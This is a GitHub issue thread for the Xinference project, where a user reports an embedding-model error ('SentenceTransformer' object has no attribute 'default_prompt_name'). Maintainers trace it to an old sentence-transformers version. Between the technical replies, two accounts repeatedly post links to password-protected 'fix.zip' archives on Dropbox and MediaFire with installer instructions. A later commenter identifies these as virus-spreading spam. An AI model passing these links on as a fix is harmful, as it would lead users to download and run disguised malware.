### ISSUE TITLE
调用embedding模型报错

### ISSUE THREAD

**Issue by ybsbbw** [xorbitsai/inference#2157]
### System Info / 系統信息

8卡A-800，cuda12.2，

transformers  4.40.2
torch 2.1.2
### Running Xinference with Docker? / 是否使用 Docker 运行 Xinfernece？

- [ ] docker / docker
- [X] pip install / 通过 pip install 安装
- [ ] installation from source / 从源码安装

### Version info / 版本信息

xinference      0.14.3

### The command used to start Xinference / 用以启动 xinference 的命令

网页端启动
![image](https://github.com/user-attachments/assets/024bbff1-7db4-4292-942b-11ed2dd61cd3)

### Reproduction / 复现过程

def build_vectorstore(
                      db_name,
                      db_path,
                      server_url,
                      model="Bge-m3"):
    """
    "Bge-m3": 创建的embedding模型名称
    """
    embeddings = XinferenceEmbeddings(server_url=server_url, model_uid=model)

    vectorstore = Chroma(collection_name=db_name,
                              persist_directory=db_path,
                              embedding_function=embeddings
                              )
    return vectorstore
a_vectorstore = build_vectorstore(***) #此处***为参数
retrieve_result = a_vectorstore .similarity_search_with_score(query=text, k=top_k, filter=where)

报错：
发生异常: RuntimeError
AttributeError: [address=0.0.0.0:36191, pid=972983] 'SentenceTransformer' object has no attribute 'default_prompt_name'
2024-08-26 11:16:53,120 xinference.api.restful_api 917636 ERROR    [address=0.0.0.0:36191, pid=972983] 'SentenceTransformer' object has no attribute 'default_prompt_name'
Traceback (most recent call last):
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/api/restful_api.py", line 1189, in create_embedding
    embedding = await model.create_embedding(body.input, **kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xoscar/backends/context.py", line 227, in send
    return self._process_result_message(result)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xoscar/backends/context.py", line 102, in _process_result_message
    raise message.as_instanceof_cause()
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xoscar/backends/pool.py", line 659, in send
    result = await self._run_coro(message.message_id, coro)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xoscar/backends/pool.py", line 370, in _run_coro
    return await coro
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xoscar/api.py", line 384, in __on_receive__
    return await super().__on_receive__(message)  # type: ignore
  File "xoscar/core.pyx", line 558, in __on_receive__
    raise ex
  File "xoscar/core.pyx", line 520, in xoscar.core._BaseActor.__on_receive__
    async with self._lock:
  File "xoscar/core.pyx", line 521, in xoscar.core._BaseActor.__on_receive__
    with debug_async_timeout('actor_lock_timeout',
  File "xoscar/core.pyx", line 526, in xoscar.core._BaseActor.__on_receive__
    result = await result
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/core/utils.py", line 45, in wrapped
    ret = await func(*args, **kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/core/model.py", line 90, in wrapped_func
    ret = await fn(self, *args, **kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/core/model.py", line 572, in create_embedding
    return await self._call_wrapper_json(
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/core/model.py", line 401, in _call_wrapper_json
    return await self._call_wrapper("json", fn, *args, **kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/core/model.py", line 114, in _async_wrapper
    return await fn(*args, **kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/core/model.py", line 418, in _call_wrapper
    ret = await asyncio.to_thread(fn, *args, **kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/asyncio/threads.py", line 25, in to_thread
    return await loop.run_in_executor(None, func_call)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/concurrent/futures/thread.py", line 58, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/model/embedding/core.py", line 378, in create_embedding
    all_embeddings, all_token_nums = encode(
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/xinference/model/embedding/core.py", line 260, in encode
    elif model.default_prompt_name is not None:
  File "/home/wpz/anaconda3/envs/llm/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1695, in __getattr__
    raise AttributeError(f"'{type(self).__name__}' object has no attribute '{name}'")
AttributeError: [address=0.0.0.0:36191, pid=972983] 'SentenceTransformer' object has no attribute 'default_prompt_name'

### Expected behavior / 期待表现

能够正常调用embedding模型

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ybsbbw** [comment]
之前版本的是能用的，这个和gcc有什么关系。。。

**Comment by qinxuye** [comment]
嗯，社区的改动导致出问题， @Zzzz1111 能看下吗？

**Comment by Zzzz1111** [comment]
> 嗯，社区的改动导致出问题， @Zzzz1111 能看下吗？

我看一下

**Comment by octopusYan** [comment]
> 以前的版本是能用的，这个和gcc有什么关系。。。

病毒文件，好多开源仓库被发这种评论

**Comment by ybsbbw** [comment]
xinference切换到0.12.0版本后能够正常运行了

**Comment by Zzzz1111** [comment]
![image](https://github.com/user-attachments/assets/a055c9d5-b8fc-463f-aa3b-63e7e0eb642d)
![image](https://github.com/user-attachments/assets/32a3b02e-5d9c-4652-a8cd-4ac6d44595d2)
![image](https://github.com/user-attachments/assets/79238470-6a1d-49e8-978d-f90905421080)
0.14.3 测试可以正常运行

**Comment by Zzzz1111** [comment]
![image](https://github.com/user-attachments/assets/b2902d57-3369-4bba-8160-d8a9a696a043)

**Comment by Zzzz1111** [comment]
> xinference切换到0.12.0版本后能够正常运行了
可以发一下SentenceTransformer版本么

**Comment by Zzzz1111** [comment]
![image](https://github.com/user-attachments/assets/814248c0-4ac9-4451-96be-8a09d1188510)
@ybsbbw 可能是SentenceTransformer版本太低导致的

**Comment by Zzzz1111** [comment]
> 嗯，社区的改动导致出问题， @Zzzz1111 能看下吗？
![image](https://github.com/user-attachments/assets/4091f192-1862-4eec-a69b-4b7eef689ba2)

应该不是我提交的PR导致的，default_prompt_name这个参数是在#1994中增加的 @qinxuye

**Comment by ybsbbw** [comment]
> ![image](https://private-user-images.githubusercontent.com/34296741/361342746-814248c0-4ac9-4451-96be-8a09d1188510.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjQ3MjMzMzcsIm5iZiI6MTcyNDcyMzAzNywicGF0aCI6Ii8zNDI5Njc0MS8zNjEzNDI3NDYtODE0MjQ4YzAtNGFjOS00NDUxLTk2YmUtOGEwOWQxMTg4NTEwLnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDA4MjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQwODI3VDAxNDM1N1omWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTNlNWE5NjgxNTBlY2E3NWNhZjkyYWNiYTFhMzQxODVhY2NlODNmMjY0YWNlNTQwM2VjYThkZmRiM2QzN2JkMzYmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0JmFjdG9yX2lkPTAma2V5X2lkPTAmcmVwb19pZD0wIn0.fWVkUv0SzA3_auUWfVYfUXyYCfEox_Z4bQwKtm01CJA) @ybsbbw 可以发一下SentenceTransformer版本么？可能是SentenceTransformer版本太低导致的，可以尝试升级到v2.4.0之后的版本

我用的SentenceTransformer版本是 2.2.2，xinference更新到最新的0.14.3就报错了，但是xinference切换到0.12.0就没有问题

**Comment by qinxuye** [comment]
@ybsbbw sentence-transformers>=2.7.0 需要这个版本至少

**Comment by ybsbbw** [comment]
> @ybsbbw sentence-transformers>=2.7.0 需要这个版本至少

安装0.14.3的时候sentence-transformers也没有作为依赖项自动更新啊......下次更新的时候可以把它放到依赖项里自动更新一下

**Comment by qinxuye** [comment]
应该是限制了版本的

https://github.com/xorbitsai/inference/blob/10094f9390261aefd983ef1af9db10edff648d5d/setup.cfg#L91

先 close。
